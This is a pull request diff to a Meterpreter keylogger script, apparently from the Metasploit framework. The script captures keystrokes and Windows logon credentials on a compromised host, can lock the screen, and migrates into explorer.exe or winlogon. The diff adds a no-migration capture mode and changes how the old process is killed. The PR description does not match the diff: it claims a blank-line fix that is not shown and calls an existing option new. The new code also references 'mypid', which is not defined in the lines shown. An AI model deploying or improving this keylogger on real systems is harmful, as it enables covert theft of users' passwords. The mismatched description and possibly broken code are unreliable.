### PR TITLE
keylogrecorder bug fix and functionality update

### DIFF
--- a/scripts/meterpreter/keylogrecorder.rb
+++ b/scripts/meterpreter/keylogrecorder.rb
@@ -8,7 +8,7 @@ session = client
 @@exec_opts = Rex::Parser::Arguments.new(
 	"-h"  => [ false, "Help menu." ],
 	"-t"  => [ true,  "Time interval in seconds between recollection of keystrokes, default 30 seconds." ],
-	"-c"  => [ true,  "Type of key capture. (0) for user key presses or (1) for winlogon credential capture Default is 0." ],
+	"-c"  => [ true,  "Type of key capture. (0) for user key presses, (1) for winlogon credential capture, or (2) for no migration.  Default is 2." ],
 	"-l"  => [ false, "Lock screen when capturing Winlogon credentials."],
 	"-k" => [ false, "Kill old Process"]
 )
@@ -40,7 +40,7 @@ logfile = logs + ::File::Separator + host + filenameinfo + ".txt"
 keytime = 30
 
 #Type of capture
-captype = 0
+captype = 2
 # Function for locking the screen -- Thanks for the idea and API call Mubix
 def lock_screen
 	print_status("Locking Screen...")
@@ -191,7 +191,11 @@ kill = false
 	end
 }
 if client.platform =~ /win32|win64/
-	if explrmigrate(session,captype,lock, kill)
+	if (captype.to_i == 2)
+		if startkeylogger(session)
+			keycap(session, keytime, logfile)
+		end
+	elsif explrmigrate(session,captype,lock, kill)
 		if startkeylogger(session)
 			keycap(session, keytime, logfile)
 		end

--- a/scripts/meterpreter/keylogrecorder.rb
+++ b/scripts/meterpreter/keylogrecorder.rb
@@ -54,10 +54,6 @@ end
 #Function to Migrate in to Explorer process to be able to interact with desktop
 def explrmigrate(session,captype,lock,kill)
 	#begin
-	
-	server = client.sys.process.open
-	original_pid = server.pid
-	
 	if captype.to_i == 0
 		process2mig = "explorer.exe"
 	elsif captype.to_i == 1
@@ -81,9 +77,13 @@ def explrmigrate(session,captype,lock,kill)
 			print_status("Migration Successful!!")
 			
 			if (kill)
-				print_status("Killing old process")
-				client.sys.process.kill(original_pid)
-				print_status("Old process killed.") 
+				begin
+					print_status("Killing old process")
+					client.sys.process.kill(mypid)
+					print_status("Old process killed.")
+				rescue
+					print_status("Failed to kill old process.")
+				end
 			end
 		end
 	end


### PR DESCRIPTION
I have fixed a bug in the scripts/meterpreter/keylogrecorder.rb where the logger adds blank lines to the log file every polling round if there is no user input.  I also added a new argument "-k" which if selected, will attempt to kill the old process on a successful migration.

Please consider my changes for the master branch.
